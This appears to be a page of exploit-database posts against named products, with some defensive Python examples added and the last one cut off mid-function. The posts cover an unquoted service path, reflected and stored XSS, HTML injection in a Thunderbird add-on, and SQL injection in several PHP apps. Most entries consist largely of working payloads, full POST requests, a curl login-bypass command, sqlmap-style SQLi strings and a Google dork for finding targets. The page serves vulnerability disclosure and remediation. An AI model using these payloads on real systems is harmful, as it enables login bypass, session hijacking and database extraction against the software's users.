All posts published by ISHACK AI BOT
-
10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 04-11-2021
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Tested Version: 9.31
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

srvInventoryWebServer  srvInventoryWebServer  C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe  Auto

C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: srvInventoryWebServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : srvInventoryWebServer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
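Added here as a defender-side example, not part of the advisory: the Python below parses `sc qc` output like the one shown, flags a service whose unquoted binary path contains spaces, records the start type and account that decide how serious the misconfiguration is, and builds the `sc config ... binPath=` command that quotes the path. The first sample is the advisory's own output; the second (`ExampleSvc`) is constructed for contrast.

```python
import re

# "sc qc" output for the service named in the advisory above (copied from the page).
SC_QC_VULNERABLE = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: srvInventoryWebServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\10-Strike Network Inventory Explorer Pro\\InventoryWebServer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : srvInventoryWebServer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# Constructed output for a correctly quoted service (hypothetical "ExampleSvc"), for contrast.
SC_QC_QUOTED = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ExampleSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\\Program Files\\Example Vendor\\svc.exe" -k example
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Example Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Turn the KEY : value lines of 'sc qc' output into a dict."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s?(.*)$", line)
        if m:
            cfg[m.group(1)] = m.group(2).strip()
    return cfg


def executable_path(binary_path_name):
    """Return (exe_path, quoted). For an unquoted value the executable is taken to
    end at the first '.exe' token; anything after it is treated as arguments."""
    s = binary_path_name.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return (s[1:end] if end > 0 else s[1:]), True
    m = re.match(r"(.*?\.exe)(\s|$)", s, re.IGNORECASE)
    return (m.group(1) if m else s), False


def check_service(cfg):
    """Flag an unquoted path containing spaces. Start type and account are kept
    because an auto-start service running as LocalSystem is the worst case.
    'fix' is the sc command that stores the path with quotes."""
    exe, quoted = executable_path(cfg.get("BINARY_PATH_NAME", ""))
    name = cfg.get("SERVICE_NAME", "")
    vulnerable = (not quoted) and (" " in exe)
    finding = {
        "service": name,
        "vulnerable": vulnerable,
        "auto_start": "AUTO_START" in cfg.get("START_TYPE", ""),
        "account": cfg.get("SERVICE_START_NAME", ""),
        "fix": None,
    }
    if vulnerable:
        # The inner quotes must be escaped so that the registry value keeps them.
        finding["fix"] = 'sc config ' + name + ' binPath= "\\"' + exe + '\\""'
    return finding


def audit(outputs):
    """Run the check over several 'sc qc' outputs and return only the findings."""
    return [f for f in (check_service(parse_sc_qc(o)) for o in outputs) if f["vulnerable"]]


if __name__ == "__main__":
    for f in audit([SC_QC_VULNERABLE, SC_QC_QUOTED]):
        print(f["service"], "auto_start=%s account=%s" % (f["auto_start"], f["account"]))
        print("   fix:", f["fix"])
```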
-
Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)
# Exploit Title: Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-11-05
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.criticalgears.com/
# Software Link: https://www.criticalgears.com/product/authorize-net-payment-terminal/
#                https://www.criticalgears.com/product/paypal-pro-payment-terminal/
#                https://www.criticalgears.com/product/stripe-payment-terminal/
# Version: 2.4.1, 2.2.1 & 3.1
# Tested on: Linux (Apache)

Document Title:
===============
Payment Terminal 2.x & v3.x - Multiple XSS Web Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2280

Release Date:
=============
2021-11-05

Vulnerability Laboratory ID (VL-ID):
====================================
2280

Common Vulnerability Scoring System:
====================================
5.2

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Quick and easy payment terminal as script for clients to pay for products and services.

(Copy of the Homepage: https://www.criticalgears.com/product/authorize-net-payment-terminal/ )
(Copy of the Homepage: https://www.criticalgears.com/product/paypal-pro-payment-terminal/ )
(Copy of the Homepage: https://www.criticalgears.com/product/stripe-payment-terminal/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Authorize.net Payment Terminal v2.4.1.
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Stripe Payment Terminal v2.2.1.
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the PayPal PRO Payment Terminal v3.1.
Affected Product(s):
====================
CriticalGears
Product: Authorize.net Payment Terminal 2.4.1 - Payment Form Script (PHP) (Web-Application)
Product: Stripe Payment Terminal v2.2.1 - Payment Form Script (PHP) (Web-Application)
Product: PayPal PRO Payment Terminal v3.1 - Payment Form Script (PHP) (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-08-22: Researcher Notification & Coordination (Security Researcher)
2021-08-23: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Pre Auth (No Privileges or Session)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
Multiple non-persistent cross site scripting web vulnerabilities have been discovered in the official Authorize.net Payment Terminal v2.4.1, the PayPal PRO Payment Terminal v3.1 and the Stripe Payment Terminal v2.2.1.
The vulnerability allows remote attackers to inject their own malicious script code via a non-persistent attack vector to compromise client-side browser-to-web-application requests.

The non-persistent cross site scripting web vulnerabilities are located in the `item_description`, `fname`, `lname`, `address`, `city` and `email` parameters of the `Billing Information` and `Payment Information` forms.
Attackers are able to inject their own malicious script code into the `Description`, `Firstname`, `Lastname`, `Address`, `City` and `Email` input fields to manipulate client-side requests.
The request method used to inject is POST and the attack vector is non-persistent on the client side. When the form is embedded in another web service, attackers are able to exploit the bug by triggering execution of the script code in the invalid exception handling.
The PayPal PRO Payment Terminal v3.1 and the Stripe Payment Terminal v2.2.1 share the same vulnerable script and are affected by the same simple validation vulnerability.

Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Billing Information
[+] Payment Information

Vulnerable Input(s):
[+] Description
[+] Firstname
[+] Lastname
[+] Address
[+] City
[+] Email

Vulnerable Parameter(s):
[+] item_description
[+] fname
[+] lname
[+] address
[+] city
[+] email

Affected Module(s):
[+] Exception Handling (Invalid)

Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without an account and with low or medium user interaction.
For security demonstration or to reproduce the cross site scripting web vulnerability, follow the provided information and steps below.
Exploitation: Payload

">%20<iframe src=evil.source onload=alert(document.domain)>%20</iframe>
">%20<iframe src=evil.source onload=alert(document.cookie)>%20</iframe>

Vulnerable Source: Invalid (Exception-Handling - onkeyup checkFieldBack)

<div id="accordion">
<!-- PAYMENT BLOCK -->
<h2 class="current">Payment Information</h2>
<div class="pane" style="display:block">
<label>Description:</label>
<input name="item_description" id="item_description" type="text" class="long-field" value=""> <iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);"
<div class="clr"></div>
<label>Amount:</label>
<input name="amount" id="amount" type="text" class="small-field" value="1.00" onkeyup="checkFieldBack(this);noAlpha(this);" onkeypress="noAlpha(this);">
<div class="clr"></div>
</div>
<!-- PAYMENT BLOCK -->
-
<!-- BILLING BLOCK -->
<h2>Billing Information</h2>
<div class="pane">
<label>First Name:</label>
<input name="fname" id="fname" type="text" class="long-field" value="">"><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>
<label>Last Name:</label>
<input name="lname" id="lname" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>
<label>Address:</label>
<input name="address" id="address" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>
<label>City:</label>
<input name="city" id="city" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>

--- PoC Session Logs (POST) ---
https://autherminal.localhost:8080/authorize-terminal/
Host: autherminal.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------317816260230756398612099882125
Content-Length: 3270
Origin: https://autherminal.localhost:8080
Connection: keep-alive
Referer: https://autherminal.localhost:8080/authorize-terminal/
Cookie: PHPSESSID=952c12ca44f97e3b4056b731c7455a7c
item_description="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&amount=1&fname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
&lname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
&address="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
&city="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&country=US&state=-AU-NSW&zip=2411
&email="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&cctype=V&ccn=4111111111111&ccname=test&exp1=11&exp2=2022&cvv=123
&g-recaptcha-response=03AGdBq26Aocx9i3nRxaDSsQIyF0Avo9p1ozb5407foq4ywp7IEY1Y-q9g14tFgwjjkNItQMhnF
&submit.x=50&submit.y=14&process=yes
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=utf-8
vary: Accept-Encoding

Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely restricting the input in combination with parsing or escaping the content.
After that, the onkeyup checkFieldBack handler should be sanitized correctly to prevent script code execution for clients.

Security Risk:
==============
The security risk of the client-side cross site scripting vulnerability in the web-application is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com   www.vuln-lab.com   www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com   paste.vulnerability-db.com   infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab   facebook.com/VulnerabilityLab   youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   vulnerability-lab.com/rss/rss_upcoming.php   vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php   vulnerability-lab.com/register.php   vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
-
ImportExportTools NG 10.0.4 - HTML Injection
# Exploit Title: ImportExportTools NG 10.0.4 - HTML Injection
# Date: 2021-11-05
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://github.com/thundernest/import-export-tools-ng
# Software Link: https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/
# Version: 10.0.4
# Tested on: Windows

Document Title:
===============
ImportExportTools NG 10.0.4 - HTML Injection Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2308

Release Date:
=============
2021-11-05

Vulnerability Laboratory ID (VL-ID):
====================================
2308

Common Vulnerability Scoring System:
====================================
4.2

Vulnerability Class:
====================
Script Code Injection

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Adds tools to import/export messages and folders (NextGen).

(Copy of the Homepage: https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent validation vulnerability in the official ImportExportTools NG 10.0.4 for Mozilla Thunderbird.
Affected Product(s):
====================
Christopher Leidigh
Product: ImportExportTools NG v10.0.4 - Addon (Mozilla Thunderbird)

Vulnerability Disclosure Timeline:
==================================
2021-10-07: Researcher Notification & Coordination (Security Researcher)
2021-10-08: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Pre Auth (No Privileges or Session)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
An HTML injection web vulnerability has been discovered in the official ImportExportTools NG 10.0.4 for Mozilla Thunderbird.
The vulnerability allows a remote attacker to inject HTML payloads to compromise application data or session credentials.

The vulnerability is located in the HTML export function. Subject content is not sanitized on export the way it is in Thunderbird's own exports.
This allows a remote attacker to send malicious emails with malformed HTML payloads in the subject that execute on preview after the victim user performs an HTML export.

Vulnerable Module(s):
[+] Export (HTML)

Proof of Concept (PoC):
=======================
The web vulnerability can be exploited by remote attackers without a user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.

Manual steps to reproduce the vulnerability ...
1. Install Mozilla Thunderbird
2. Install ImportExportTools NG v10.0.4
3. Use another email account to write to the target inbox where the export takes place
   Note: Inject any HTML test payload into the subject
4. The target user exports the contents of the inbox as HTML, where the payload executes
5. Successful reproduction of the encoding validation vulnerability!

Note: We reported the same issue some years ago in KeePass and Kaspersky Password Manager on export via HTML, and it was successfully resolved.

Vulnerable Source: ImportExportTools Exported HTML File

<html><head>
<style>
table { border-collapse: collapse; }
th { background-color: #e6ffff; }
th, td { padding: 4px; text-align: left; vertical-align: center; }
tr:nth-child(even) { background-color: #f0f0f0; }
tr:nth-child(odd) { background-color: #fff; }
tr>:nth-child(5) { text-align: center; }
</style>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Posteingang</title>
</head>
<body>
<h2>Posteingang (10/07/2021)</h2><table width="99%" border="1"><tbody><tr><th><b>Betreff</b></th>
<th><b>Von</b></th><th><b>An</b></th><th><b>Datum</b></th><th><b>Anhang</b></th></tr>
<tr><td><a href="Nachrichten/20211007-payload%20in%20subject%20___iframe%20src%3Devil.source%20onload%3Dalert(document.domain)_-151.html">
payload in subject "><iframe src="evil.source" onlo<="" a=""></td>
<td>[email protected]" <test@vulnerability-</td>
<td>[email protected]</td>
<td nowrap>10/07/2021</td>
<td align="center">* </td></tr>

Reference(s):
https://addons.thunderbird.net/de/thunderbird/addon/importexporttools-ng/

Solution - Fix & Patch:
=======================
The output that is visible in the subject needs to be encoded and securely sanitized to prevent execution from any listed value.
Restrict execution via import/export of special characters to prevent further attacks.
Credits & Authors:
==================
Vulnerability-Lab [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
-
Simple Client Management System 1.0 - SQLi (Authentication Bypass)
# Exploit Title: Simple Client Management System 1.0 - SQLi (Authentication Bypass)
# Exploit Author: Sentinal920
# Date: 5-11-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip
# Version: 1.0
# Tested on: Kali Linux
# Vulnerable page: Login
# Vulnerable Parameter: "password"

Technical description:
An SQL Injection vulnerability exists in the Simple Client Management System. An attacker can leverage the vulnerable "password" parameter in the "Login.php" web page to authenticate as an admin user.

Steps to exploit:
1) Navigate to http://localhost/cms/admin/login.php
2) Set the username to admin and insert your payload in the password parameter

Proof of concept (PoC):
The following payload in the password field allows logging in to the web application as admin:

admin'or'1'%3D'1

---
POST /cms/classes/Login.php?f=login HTTP/1.1
Host: localhost
Content-Length: 51
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/cms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn
Connection: close

username=admin'or'1'%3D'1&password=admin'or'1'%3D'1
---
-
Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
# Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
# Exploit Author: Sentinal920
# Date: 5-11-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip
# Version: 1.0
# Tested on: Kali Linux
# Vulnerable page: client,invoice
# Vulnerable Parameters: "lastname", "remarks"

Technical description:
A stored XSS vulnerability exists in the Simple Client Management System. An attacker can leverage this vulnerability to run JavaScript in the browsers of the web application's users, which can lead to cookie theft, defacement and more.

Steps to exploit:
1) Navigate to http://localhost/cms/admin/?page=client
2) Click on add new client
3) Insert your payload in the "lastname" parameter or the "description" parameter
4) Click save

Proof of concept (PoC):
The following payload will run the JavaScript:

<script>alert(1)</script>

1) XSS POC in Add New Client
-----------------------------
POST /cms/classes/Master.php?f=save_client HTTP/1.1
Host: localhost
Content-Length: 1026
sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBW1SfSFiXMKK7Nt
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/cms/admin/?page=client/manage_client
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn
Connection: close

------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="lastname"

<script>alert(1)</script>
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="firstname"

anything
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="middlename"

anything
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="gender"

Male
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="dob"

2021-11-03
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="contact"

xxxxxxxxxx
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="address"

xxxxxx
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="avatar"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryIBW1SfSFiXMKK7Nt--

2) XSS POC in Add New Invoice
-----------------------------
POST /cms/classes/Master.php?f=save_invoice HTTP/1.1
Host: localhost
Content-Length: 1032
sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEk0iOWhhoA0lApXo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/cms/admin/?page=invoice/manage_invoice
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn
Connection: close

------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="client_id"

1
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="service_id[]"

1
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="price[]"

250
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="discount_perc"

0
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="discount"

0
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="tax_perc"

0
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="tax"

0
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="total_amount"

250
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="remarks"

<script>alert(1)</script>
------WebKitFormBoundaryEk0iOWhhoA0lApXo--
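The three HTML injection findings on this page (the Payment Terminal fields reflected into a `value` attribute, the ImportExportTools subject written into an export table, and the stored `lastname`/`remarks` values above) share one fix: encode every untrusted string for the context it lands in. The Python below is an added example, not code from any of the products: it renders the Payment Terminal payload both unencoded and encoded and uses the standard library's HTML parser to show which elements and event handlers each output creates. The `render_*` helpers and their markup are assumptions.

```python
import html
from html.parser import HTMLParser

# Payload from the Payment Terminal advisory; the same break-out shape applies to the others.
PAYLOAD = '"><iframe src=evil.source onload=alert(document.domain)>%20</iframe>'

FIELD = '<input name="%s" id="%s" type="text" class="long-field" value="%s">'


def render_field_vulnerable(name, value):
    """Echo the submitted value straight into the value attribute, as the
    'Vulnerable Source' of the Payment Terminal advisory does."""
    return FIELD % (name, name, value)


def render_field_safe(name, value):
    """Attribute context: escape & < > " and ' before interpolation."""
    return FIELD % (name, name, html.escape(value, quote=True))


def render_export_row_safe(subject, sender, link):
    """Element-content and href contexts for an HTML export table (the
    ImportExportTools case): each untrusted string is escaped for its slot."""
    return ('<tr><td><a href="%s">%s</a></td><td>%s</td></tr>'
            % (html.escape(link, quote=True), html.escape(subject), html.escape(sender)))


class TagCollector(HTMLParser):
    """Record the elements, their attributes and any on* event handlers a
    fragment creates; this is what a browser would instantiate."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attrs = {}
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs[tag] = dict(attrs)
        self.handlers.extend(a for a, _ in attrs if a.startswith("on"))


def elements_in(fragment):
    """Parse a fragment and return the collector for inspection."""
    p = TagCollector()
    p.feed(fragment)
    p.close()
    return p


if __name__ == "__main__":
    for label, frag in (("vulnerable", render_field_vulnerable("fname", PAYLOAD)),
                        ("safe", render_field_safe("fname", PAYLOAD))):
        p = elements_in(frag)
        print(label, "elements:", p.tags, "event handlers:", p.handlers)
    # In the safe output the browser sees the payload as the field's literal value.
    print("safe value attribute:", elements_in(render_field_safe("fname", PAYLOAD)).attrs["input"]["value"])
```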
-
Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)
# Exploit Title: Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)
# Google Dork: intitle: "Inicio de Sesión - Kmaleon"
# Date: 2021-11-05
# Exploit Author: Amel BOUZIANE-LEBLOND
# Vendor Homepage: https://www.levelprograms.com
# Software Link: https://www.levelprograms.com/kmaleon-abogados/
# Version: v1.1.0.205
# Tested on: Linux
# Description:
# The Kmaleon application from levelprogram is vulnerable to
# SQL injection via the 'tipocomb' parameter of kmaleonW.php

====================
1. SQLi
====================

http://127.0.0.1/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=[SQLI]&isgroup=true

The 'tipocomb' parameter is vulnerable to SQL injection.

GET parameter 'tipocomb' is vulnerable.
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=-9144 OR 6836=6836&isgroup=true

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 8426 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(8426=8426,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&isgroup=true

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 2738 FROM (SELECT(SLEEP(5)))EYSv)&isgroup=true
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
-
Money Transfer Management System 1.0 - Authentication Bypass
# Exploit Title: Money Transfer Management System 1.0 - Authentication Bypass
# Date: 2021-11-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10

# Admin panel authentication bypass

Admin panel authentication can be bypassed due to a SQL injection in the login form:

Request:

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/mtms/admin/login.php
Content-Length: 37
Cookie: PHPSESSID=8jff4m81f5j0ej125k1j9rdrc3
Connection: keep-alive

username='=''or'&password='=''or'

PoC:

curl -d "username='=''or'&password='=''or'" -X POST http://localhost/mtms/admin/login.php
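The login bypasses in the Simple Client Management System advisory and the Money Transfer Management System advisory above have one root cause: the submitted username and password are concatenated into the login query. As an added example that is not code from either project, the Python below reproduces that handler against a constructed in-memory SQLite table, feeds it the first advisory's PoC body, and shows the parameterised form rejecting the same input. The `users` table, its single account and `make_db` are assumptions.

```python
import sqlite3
from urllib.parse import parse_qs

# Request body from the Simple Client Management System advisory (URL-encoded as sent).
POC_BODY = "username=admin'or'1'%3D'1&password=admin'or'1'%3D'1"


def make_db():
    """Constructed stand-in for the application's admin table (one account).
    Plaintext storage is only to keep the demo short; the point here is the query."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users (username, password) VALUES (?, ?)", ("admin", "S3cret!"))
    con.commit()
    return con


def creds_from_body(body):
    """Decode the form body the way the PHP side sees it in $_POST."""
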